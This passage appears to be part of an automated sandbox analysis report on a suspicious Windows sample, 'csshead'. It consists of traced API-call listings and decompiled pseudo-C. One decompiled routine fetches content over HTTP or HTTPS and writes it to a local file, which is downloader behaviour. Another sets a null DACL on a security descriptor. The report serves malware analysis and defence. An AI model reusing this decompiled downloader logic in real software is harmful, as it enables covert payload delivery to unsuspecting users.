      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F3EA
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F3F1
    • GetCurrentThreadId.KERNEL32 ref: 0041F405
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041F413
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041F42D
    • DialogBoxParamA.USER32(00442B94,00000064,?,00408EC0,?), ref: 0041F44B
    • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 0041F470
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,00000000,0041F69F,00000000), ref: 0041F458
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • InterlockedDecrement.KERNEL32(0042DE52), ref: 00425A6E
    • InterlockedDecrement.KERNEL32(1424541B), ref: 00425A7B
    • InterlockedDecrement.KERNEL32(541B0824), ref: 00425A88
    • InterlockedDecrement.KERNEL32(442BDB33), ref: 00425A95
    • InterlockedDecrement.KERNEL32(DA83D8F7), ref: 00425AA2
    • InterlockedDecrement.KERNEL32(DA83D8F7), ref: 00425ABE
    • InterlockedDecrement.KERNEL32(24448BD8), ref: 00425ACE
    • InterlockedDecrement.KERNEL32(44395371), ref: 00425AE4
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 004259D7
    • InterlockedIncrement.KERNEL32(?), ref: 004259E4
    • InterlockedIncrement.KERNEL32(?), ref: 004259F1
    • InterlockedIncrement.KERNEL32(?), ref: 004259FE
    • InterlockedIncrement.KERNEL32(?), ref: 00425A0B
    • InterlockedIncrement.KERNEL32(?), ref: 00425A27
    • InterlockedIncrement.KERNEL32(00000000), ref: 00425A37
    • InterlockedIncrement.KERNEL32(?), ref: 00425A4D
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
    • LockResource.KERNEL32(00000000), ref: 0041F4D9
    • LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3
    • LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
    • DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6
    • DeleteObject.GDI32(00000000), ref: 0041F652
      • Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
      • Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
      • Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
      • Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
      • Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041EE80: SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A
      • Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041E200
      • Part of subcall function 0041E1F0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041E208
      • Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411AD3
    • GetWindowLongA.USER32(?,000000FC), ref: 00411AE8
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00411AFD
    • GetWindowLongA.USER32(?,000000FC), ref: 00411B18
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00411B2A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00420413
    • GetWindowLongA.USER32(?,000000FC), ref: 00420428
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 0042043D
    • GetWindowLongA.USER32(?,000000FC), ref: 00420458
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0042046A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • DefFrameProcA.USER32(?,?,?,?,?), ref: 00418A9A
    • GetWindowLongA.USER32(?,000000FC), ref: 00418AAF
    • DefFrameProcA.USER32(?,?,00000082,?,?), ref: 00418AC4
    • GetWindowLongA.USER32(?,000000FC), ref: 00418ADF
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00418AF1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32(?), ref: 0041922F
    • GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
    • GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
    • lstrcmp.KERNEL32(?,&Window), ref: 004192E4
    • GetSubMenu.USER32(?,?), ref: 00419317
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32 ref: 00418EEB
    • RemoveMenu.USER32(?,-00000001,00000400), ref: 00418F07
    • DestroyMenu.USER32 ref: 00418F15
    • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 00418F46
    • PeekMessageA.USER32 ref: 00418F88
    • PtInRect.USER32(00000000,00000000,?), ref: 00418F9D
    • PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 00418FBC
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
    • GetWindowLongA.USER32(?,000000EC), ref: 004202F4
    • GetWindowLongA.USER32(?,000000EC), ref: 00420302
    • GetWindowLongA.USER32(?,000000F0), ref: 00420311
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
    • GetClientRect.USER32(?,?), ref: 00420378
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 0041877C
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
    • GetWindowRect.USER32(?,?), ref: 004187C9
    • GetWindowLongA.USER32(?,000000F0), ref: 004187E4
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
    • GetWindowRect.USER32(?,?), ref: 00418823
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
    • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041645A
    • lstrcmp.KERNEL32(#32768,00000000), ref: 0041646A
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041649A
    • lstrcmp.KERNEL32(#32768,00000000), ref: 004164AA
    • CallNextHookEx.USER32(00442A54,?,?,?), ref: 004164D8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
    • RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
    • RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
    • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
      • Part of subcall function 00421E10: IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
      • Part of subcall function 00421E10: GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,004124FE), ref: 00421E41
      • Part of subcall function 00421E10: RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
      • Part of subcall function 00421E10: InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
      • Part of subcall function 00421E10: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,004124FE), ref: 00421E67
      • Part of subcall function 00421E10: HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429B61
    • __FindPESection.LIBCMT ref: 00429B7B
    • VirtualQuery.KERNEL32(?,004420A4,0000001C,004420A4,?,?,?,?,?,00429F50,0043CE68,000000FE,?,00423B11,?), ref: 00429C61
    • __FindPESection.LIBCMT ref: 00429CB0
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429CD4
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 004299E3
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 00429A21
    • __FindPESection.LIBCMT ref: 00429CEE
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000200,?,?,?,?,?,?), ref: 0042C751
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042C7BF
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042C7DB
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C814
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C87A
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0042C899
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
    • SelectObject.GDI32(00000000,?), ref: 0041EEDA
    • DeleteDC.GDI32(00000000), ref: 0041EF7C
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • GetCurrentProcess.KERNEL32 ref: 0041F006
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041E470: SelectObject.GDI32(?,00000000), ref: 0041E504
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • lstrlen.KERNEL32(?,004420A4), ref: 00432A87
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
    • GetLastError.KERNEL32 ref: 00432AAC
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
    • GetLastError.KERNEL32 ref: 00432B56
    • SysAllocString.OLEAUT32(00000000), ref: 00432B71
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetSysColorBrush.USER32(0000001D), ref: 0041557A
    • FillRect.USER32(?,?,00000000), ref: 00415586
    • GetSysColorBrush.USER32(0000000D), ref: 0041558E
    • FrameRect.USER32(?,?,00000000), ref: 0041559A
    • GetSysColor.USER32(00000011), ref: 004155C4
      • Part of subcall function 00413E50: SetTextColor.GDI32(?,?), ref: 00413E6B
      • Part of subcall function 00413E50: SetBkMode.GDI32(?,?), ref: 00413E76
      • Part of subcall function 00413E50: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
      • Part of subcall function 00413E50: SelectObject.GDI32(?,00000000), ref: 00413E9C
      • Part of subcall function 00413E50: SendMessageA.USER32 ref: 00413F0F
      • Part of subcall function 00413E50: DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
      • Part of subcall function 00413E50: SelectObject.GDI32(?,?), ref: 00413F47
    • GetSysColor.USER32(00000011), ref: 004155F3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 64%
    			E00404408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x40a0d4; // 0x401cb4
    					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L5:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L5;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetClientRect.USER32 ref: 00420817
    • GetWindowLongA.USER32(?,000000F0), ref: 00420833
    • GetWindowRect.USER32 ref: 0042085B
    • GetWindowLongA.USER32(?,000000F0), ref: 00420873
    • GetWindowRect.USER32(?,?), ref: 0042089B
    • SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,?,00000014), ref: 004208CD
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetActiveWindow.USER32 ref: 00410EDF
    • GetWindowThreadProcessId.USER32(00000000), ref: 00410EE6
    • GetCurrentProcessId.KERNEL32 ref: 00410EEC
    • IsWindowEnabled.USER32(?), ref: 00410EFD
    • SendMessageA.USER32(?,0000011F,00000000,?), ref: 00410F40
    • SendMessageA.USER32(?,0000011F,FFFF0000,00000000), ref: 00410F58
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
    • GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,004124FE), ref: 00421E41
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,004124FE), ref: 00421E67
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E00403C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
    				intOrPtr _v8;
    				CHAR* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				intOrPtr _v44;
    				long _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed char _v68;
    				signed int _v72;
    				char _v201;
    				char _v458;
    				void _v1483;
    				signed int _t88;
    				intOrPtr _t93;
    				void* _t94;
    				intOrPtr _t162;
    				intOrPtr _t165;
    				void* _t175;
    				void* _t180;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_t176 =  *0x40b7a4;
    				if( *0x40b7a4 == 0) {
    					E00403A04(_t176);
    				}
    				_t162 =  *0x40a1a4; // 0x401ec0
    				_t88 = E00401110(_v8, _t162);
    				asm("sbb eax, eax");
    				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
    				_v56 = E00401110(_v8, E00403E98);
    				if(_v56 != 0) {
    					_v56 = _v56 + 2;
    					_v60 = E00401110(_v56, 0x403e9c);
    					_v32 = _v60 - _v56;
    					E004012B8( &_v201, _v32, _v56);
    					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
    					E00401308( &_v458, _v60);
    				}
    				_t93 =  *0x40a298; // 0x0
    				_t94 = _t93 - 1;
    				_t180 = _t94;
    				if(_t180 < 0) {
    					_v64 = 0;
    				} else {
    					if(_t180 == 0) {
    						_v64 = 0;
    					} else {
    						if(_t94 == 1) {
    							_v64 = 1;
    						}
    					}
    				}
    				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x50;
    				} else {
    					_v72 = 0x1bb;
    				}
    				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x4400000;
    				} else {
    					_v72 = 0x4c03000;
    				}
    				_t165 =  *0x40a244; // 0x4020b8
    				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
    				if(_v68 != 0) {
    					_v32 = 4;
    					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
    					_v72 = _v72 | 0x00000100;
    					E0040170C(_v28,  &_v72, 0x1f, 4);
    				}
    				E004015E4(_v28, 0, 0, 0, 0);
    				_v32 = 4;
    				_v36 = 0;
    				_v40 = 0;
    				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
    				if(_v36 != 0xc8) {
    					L24:
    					E0040151C(_v28);
    					E0040151C(_v24);
    					E0040151C(_v20);
    					return _v16;
    				} else {
    					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
    					if(_v52 == 0xffffffff) {
    						goto L24;
    					} else {
    						goto L21;
    					}
    					do {
    						L21:
    						_v44 = E004016A4(_v28, 0,  &_v32, 0);
    						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
    						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
    					} while (_v32 != 0 || _v44 == 0);
    					CloseHandle(_v52);
    					_v16 = 0xffffffff;
    					goto L24;
    				}
    			}

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
    • CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F076
    • FlushInstructionCache.KERNEL32(00000000,?,?,00000000), ref: 0041F07D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 0041F113
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,?,00421617,?,?,?,?,?,?,?,?,00000000), ref: 0041F097
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004082F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr* _t36;
    				intOrPtr _t42;
